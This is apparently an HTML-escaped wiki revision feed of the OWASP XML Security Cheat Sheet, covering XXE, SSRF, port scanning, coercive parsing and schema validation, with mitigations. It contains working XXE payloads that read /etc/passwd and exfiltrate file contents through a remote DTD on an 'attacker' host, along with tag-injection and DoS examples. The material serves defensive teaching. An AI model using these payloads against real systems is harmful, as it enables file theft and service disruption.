]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;xxe;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an external entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt; that refers to &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;; its contents will be expanded within the &amp;lt;tt&amp;gt;root&amp;lt;/tt&amp;gt; element. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output.&lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF) happens when the server receives a malicious XML schema that makes it retrieve a resource on the attacker's behalf, for example a local file or a file served over HTTP, HTTPS, or FTP. SSRF has been used to retrieve remote files, to prove an XXE when the file cannot be reflected back, and to perform port scans or brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY % xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allow for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % file SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % dtd SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %dtd;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;send;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt;, which loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt;, which loads a remote DTD. The remote DTD should contain something like this:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % all &amp;quot;&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
%all;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL. &lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
This is the simplest and most unusual scenario. With complete disclosure you can clearly see what is going on, because you receive the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the response time when connecting to a valid port will be very quick (one second, for example). The difference between open and closed ports becomes quite clear.&lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes the differences between closed and open ports are very subtle. The only way to know the status of a port with reasonable certainty is to take multiple measurements of the time required to reach each host, and then analyze the average time for each port to determine its status. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
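&lt;br /&gt;
When assessing your own service for this kind of timing leak, the averaging step can be sketched as follows. The measurements, the threshold, and the function name &amp;lt;tt&amp;gt;split_by_average&amp;lt;/tt&amp;gt; are made up for illustration; whether the slow or the fast group corresponds to open ports depends on the implementation under test:&lt;br /&gt;

```python
from statistics import mean


def split_by_average(samples, threshold_seconds):
    """Group ports by whether their mean response time exceeds the threshold.

    samples maps a port number to a list of measured response times in seconds.
    """
    slow, fast = [], []
    for port, times in sorted(samples.items()):
        (slow if mean(times) > threshold_seconds else fast).append(port)
    return slow, fast


# Made-up measurements for illustration only
measurements = {80: [0.21, 0.19, 0.22], 81: [1.05, 0.98, 1.10]}
slow_ports, fast_ports = split_by_average(measurements, threshold_seconds=0.5)
```

If the two groups separate cleanly, the service leaks port status through response time even when it discloses no content or error details.&lt;br /&gt;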
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; in the URI. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224419</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224419"/>
				<updated>2016-12-21T19:49:20Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using documents that are not well formed.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution upon detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
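&lt;br /&gt;
The comparison described above can be sketched in Python with the standard library parser. The helper names &amp;lt;tt&amp;gt;timed_parse&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;sample_documents&amp;lt;/tt&amp;gt; are hypothetical, and the malformed sample is only one of many possible malformations (the root end tag is cut off):&lt;br /&gt;

```python
import time
import xml.etree.ElementTree as ET


def timed_parse(xml_bytes):
    """Parse once and return (well_formed, elapsed_seconds)."""
    start = time.perf_counter()
    try:
        ET.fromstring(xml_bytes)
        well_formed = True
    except ET.ParseError:
        well_formed = False
    return well_formed, time.perf_counter() - start


def sample_documents(items=1000):
    """Return a well-formed document and a copy with its final end tag cut off."""
    root = ET.Element("a")
    for _ in range(items):
        ET.SubElement(root, "b").text = "x"
    good = ET.tostring(root)
    closing = len("a") + 3  # length of the root element's closing tag
    return good, good[:-closing]


good, bad = sample_documents()
good_ok, good_time = timed_parse(good)
bad_ok, bad_time = timed_parse(bad)
```

A single measurement is noisy, so in practice each document should be parsed many times and the averages compared. The same harness should be pointed at the parser actually used by the application, since results differ between implementations.&lt;br /&gt;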
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;!-- one&lt;br /&gt;
    &amp;lt;!-- another comment&lt;br /&gt;
  comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though it is not required:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt; &lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coercive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up, and eventually deplete, the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
     ...&lt;br /&gt;
      &amp;lt;A30000&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
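&lt;br /&gt;
One possible mitigation is to reject documents whose nesting exceeds what the application legitimately needs. The following Python sketch tracks depth from streaming parser events; &amp;lt;tt&amp;gt;MAX_DEPTH&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;check_depth&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;nested_document&amp;lt;/tt&amp;gt; are assumptions made for illustration:&lt;br /&gt;

```python
import io
import xml.etree.ElementTree as ET

MAX_DEPTH = 100  # hypothetical limit; pick the smallest depth your documents need


def check_depth(xml_bytes, max_depth=MAX_DEPTH):
    """Return the maximum nesting depth, or raise once it exceeds max_depth."""
    depth = deepest = 0
    for event, _elem in ET.iterparse(io.BytesIO(xml_bytes), events=("start", "end")):
        if event == "start":
            depth += 1
            deepest = max(deepest, depth)
            if depth > max_depth:
                raise ValueError(f"nesting deeper than {max_depth} levels")
        else:
            depth -= 1
    return deepest


def nested_document(levels):
    """Build a well-formed document nested `levels` deep (test data only)."""
    root = current = ET.Element("A1")
    for i in range(2, levels + 1):
        current = ET.SubElement(current, f"A{i}")
    return ET.tostring(root)
```

The check runs as events are delivered, so the parser has already processed the current chunk of input by the time the limit triggers. It reduces the work done on hostile documents but is not a substitute for depth limits enforced inside the parser, where those are available. A document with missing end tags, like the one above, additionally fails with a parse error.&lt;br /&gt;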
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
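&lt;br /&gt;
The integrity check mentioned above can be as simple as comparing the schema file against a digest obtained through a trusted channel. The following Python sketch assumes a pinned SHA-256 value; the function name &amp;lt;tt&amp;gt;schema_matches_digest&amp;lt;/tt&amp;gt; is hypothetical:&lt;br /&gt;

```python
import hashlib
import hmac


def schema_matches_digest(schema_bytes, expected_sha256_hex):
    """Compare the SHA-256 digest of a schema file with a pinned, trusted value."""
    actual = hashlib.sha256(schema_bytes).hexdigest()
    return hmac.compare_digest(actual, expected_sha256_hex.lower())
```

The application would read the schema file as bytes, call this function before handing the schema to the validator, and refuse to continue when it returns &amp;lt;tt&amp;gt;False&amp;lt;/tt&amp;gt;. The pinned digest must be stored separately from the schema itself, otherwise an attacker who can modify one can modify both.&lt;br /&gt;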
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closes the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and sets the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10. If the application processes only the first values provided for the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD, whose set of constraints is very limited compared to the restrictions that other schema languages can apply to XML documents. This could expose the application to undesired values within elements or attributes that would otherwise be easy to constrain. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;11111..(1,000,000 digits)..11111&amp;lt;/age&amp;gt;&lt;br /&gt;
&amp;lt;/person&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. Both &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; are defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; element contains an irrelevant value, but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size of the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server. Typically this type of element should be restricted to a maximum number of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
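&lt;br /&gt;
As a minimal sketch of how another schema language could constrain the same document, the following XML Schema limits both elements. The specific limits (256 characters for &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt;, one to three digits and a maximum of 150 for &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;) are illustrative assumptions, not values taken from the original example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;person&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
              &amp;lt;!-- assumed upper bound for a name --&amp;gt;&lt;br /&gt;
              &amp;lt;xs:maxLength value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
            &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;age&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:restriction base=&amp;quot;xs:nonNegativeInteger&amp;quot;&amp;gt;&lt;br /&gt;
              &amp;lt;!-- assumed limits: at most three digits, value no greater than 150 --&amp;gt;&lt;br /&gt;
              &amp;lt;xs:pattern value=&amp;quot;[0-9]{1,3}&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:maxInclusive value=&amp;quot;150&amp;quot;/&amp;gt;&lt;br /&gt;
            &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
The &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; facet is included because the lexical form of an integer may carry leading zeros, so a range check alone would not bound the length of the string.&lt;br /&gt;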
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to a range of problems, such as the disclosure of internal errors or documents that reach the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
If you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters, since XML Schema already provides the more specific &amp;lt;tt&amp;gt;hexBinary&amp;lt;/tt&amp;gt; data type. As another example of this scenario, some values must be encoded using base64 when using XML encryption. This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element name='CipherData' type='xenc:CipherDataType'/&amp;gt;&lt;br /&gt;
&amp;lt;complexType name='CipherDataType'&amp;gt;&lt;br /&gt;
  &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name='CipherValue' type='base64Binary'/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref='xenc:CipherReference'/&amp;gt;&lt;br /&gt;
  &amp;lt;/choice&amp;gt;&lt;br /&gt;
&amp;lt;/complexType&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value and still considered it valid. The first portion of the data was properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). The restrictions were only partially enforced, which suggests that the content was checked by application code rather than validated against the sample schema.&lt;br /&gt;
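&lt;br /&gt;
Returning to the hexadecimal case mentioned at the start of this section, a dedicated data type could be declared as in the following sketch. The element name &amp;lt;tt&amp;gt;digest&amp;lt;/tt&amp;gt; and the length of 32 octets are hypothetical choices made for illustration:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;digest&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:hexBinary&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;!-- for hexBinary, length counts octets: 32 octets = 64 hexadecimal characters --&amp;gt;&lt;br /&gt;
      &amp;lt;xs:length value=&amp;quot;32&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;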
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* negativeInteger: Only negative numbers&lt;br /&gt;
* nonNegativeInteger: Positive numbers and the zero value&lt;br /&gt;
* positiveInteger: Only positive numbers&lt;br /&gt;
* nonPositiveInteger: Negative numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;1&amp;lt;/quantity&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Limiting &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since the integer data type allows negative values, an attacker who provides a negative number could cause a negative amount to be charged to the user’s account. To avoid this logical vulnerability, use &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; instead of &amp;lt;tt&amp;gt;integer&amp;lt;/tt&amp;gt;.&lt;br /&gt;
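&lt;br /&gt;
To illustrate, the following hypothetical attacker-supplied message is valid against the previous schema, because -1 is a valid &amp;lt;tt&amp;gt;xs:integer&amp;lt;/tt&amp;gt;. An application computing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt; would obtain 10 * -1 = -10:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;!-- illustrative attacker-chosen value --&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;-1&amp;lt;/quantity&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;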
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
